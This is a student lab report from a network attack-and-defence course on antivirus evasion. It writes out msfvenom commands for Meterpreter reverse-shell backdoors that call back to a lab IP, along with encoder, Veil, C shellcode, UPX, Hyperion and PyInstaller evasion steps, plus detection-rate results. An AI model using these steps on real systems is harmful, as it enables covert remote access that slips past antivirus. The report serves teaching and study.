20232323 2025-2026-1《网络与系统攻防技术》实验三实验报告

一.实验内容
(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧。
正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
veil，加壳工具
使用C + shellcode编程
 (2)通过组合应用各种技术实现恶意代码免杀。
如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。
二.问题回答
(1)杀软是如何检测出恶意代码的？
特征码扫描：传统杀软最核心、最成熟的检测方式，本质是比对 “已知坏人” 的指纹。
启发式分析：通过分析程序的代码结构和逻辑，预判其是否可能是恶意代码，专门应对 “零日漏洞攻击”。
行为监控：针对特征码无法识别的 “未知恶意代码”，行为分析通过监控程序运行后的行为来判断是否有害，
沙箱分析：在一个隔离的虚拟环境（沙箱）中运行可疑程序，观察其行为。
云查杀：将本地难以判断的可疑文件上传到云端服务器，利用云端更庞大的特征库和计算能力进行深度分析，快速反馈结果。
(2)免杀是做什么？
免杀的核心目的，就是通过技术手段修改恶意代码，让它能绕过杀毒软件（杀软）的检测，从而在目标设备上偷偷运行。
(3) 免杀的基本方法有哪些？
改特征：加壳/脱壳、混淆代码，文件修改。
隐藏行为：进程注入，行为触发条件，API钩子
模拟正常：伪造程序信息，模拟正常逻辑，分段加载代码
三.实验过程
3.1正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧。
(1)输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 -f exe >20232323_1.exe生成后门可执行文件 

(2)将生成的后门放入virustotal中进行检测。（人机验证花费不少时间。。。。）

免杀效果为50/72，后门容易被检测到。
3）输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.239.131 LPORT=2323 -f exe >20232323_2.exe

检测

效果不是很理想
（4）输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.239.131 LPORT=2323 -f exe >20232323_3.exe

检测

效果依旧不理想
（5）使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 -f jar >20232323.jar生成jar文件

检测

效果提升，但未达到理想
（6）msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 x >20232323.php生成.php文件

检测

有不错效果
（7）使用msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 -f >20232323..py生成.py文件，并进行检测。

检测

效果理想！
（8）使用msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 x >20232323..apk生成.apk文件

检测

效果不如.py文件
3.2使用veil-evasion生成后门程序
（1）因为磁盘空间不够，所以重新创建了一个虚拟机，重新查询ip地址，然后使用sudo apt -y install veil和usr/share/veil/config/setup.sh --force --silent安装veil

打开veil并输入use 1进入Evasion模块

输入list查看载荷种类

可见载荷c/meterpreter/rev_tcp的序号为7
输入use 7选择该载荷并输入以下代码进行配置
set LHOST 192.168.239.132
set LPORT 2323
generate

通过路径/var/lib/veil/output/compiled/20232323.exe找到后门程序，并进行检测

效果并不理想

3.3使用C + shellcode编程实现免杀

使用msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.239.131LPORT=2323 -f c对2323.c进行编辑，将buf添加到代码中

输入i686-w64-mingw32-g++ shell_payload.c -o 20232323_shell_payload.exe运行程序

检测

效果提升
3.4加壳工具
使用命令upx 20232323_shell_payload.exe 20232323_hyp.exe对exe程序进行加壳

检测

效果降低
输入如下命令，为文件套上加密壳
cp 20232323_shell_payload.exe /usr/share/windows-resources/hyperion/
cd /usr/share/windows-resources/hyperion
wine hyperion.exe -v 20232323_shell_payload.exe 20232323_hyp.exe

3.5通过组合应用各种技术实现恶意代码免杀
在主机的终端上安装PyInstaller使用py -m PyInstaller -Fw 20232323_10.py，将.py文件打包成.exe，接着进行检测

检测

免杀效果显著
3.6使用火绒杀毒软件，并在虚拟机上完成回连

四.问题及解决方案
问题：安装veil时反复出现报错

解决方法：克隆地址更换成国内源

五.学习感悟
本次实验明确了杀软的检测逻辑与恶意程序的免杀手段，既看到当前杀软已能有效检测多数后门程序，也发现其对 Python 文件、冷门加壳工具等仍存在检测盲区，个人隐私仍面临威胁。同时实验也证实，现有免杀手段仅能躲避杀软首轮筛查，后门程序若要运行仍会被后续查杀，若想通过其实施攻击，还需结合社工攻击等手段关闭杀毒软件，这也进一步提示需做好病毒监测以保护隐私安全。